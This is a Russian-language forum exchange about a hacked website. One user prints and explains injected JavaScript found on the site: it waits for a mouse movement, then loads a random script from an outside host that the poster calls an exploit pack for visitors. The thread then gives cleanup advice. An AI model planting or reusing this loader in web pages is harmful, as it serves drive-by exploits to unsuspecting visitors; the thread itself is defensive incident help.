Nuv
чего ж подозрения, поломали тебя
(function() {
var url = 'http://kwksnyiqkd.blogdns.com/g/';
if (typeof window.xyzflag === 'undefined') {
window.xyzflag = 0;
}
document.onmousemove = function() {
if (window.xyzflag === 0) {
window.xyzflag = 1;
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.onreadystatechange = function () {
if (this.readyState == 'complete') {
window.xyzflag = 2;
}
};
script.onload = function() {
window.xyzflag = 2;
};
script.src = url + Math.random().toString().substring(3) + '.js';
head.appendChild(script);
}
};
})();
принцип действия такой:
расшифрованный вверху код устанавливет обработчик на перемещение мышки,
обработчик соответственно добавляет в секцию head еще один блок <script>
и прописывает в нем адрес скрипта
kwksnyiqkd.blogdns.com/g/рандомная_куета.js, что есть связкой сплойтов для твоих посетителей. На одной страничке такой код исполнится только 1 раз.
Nuv
Ну как сказать пучком, если руками поломали а не автоматом ты код удалишь, а злодей_хряцкер опять пропишет. Так и будете играться. Нужно тебе обновлять CMS, сменить свои пароли везде на всякий случай, ну и другие действия личной гигиены.
andreich
Nuv: да тут не все так, просто, пока есть только данные от FTP
и пока не совсем понятно естьли там СMS или нет
ну пока уберем ручками и права поменяю, посмотрим что из этого получится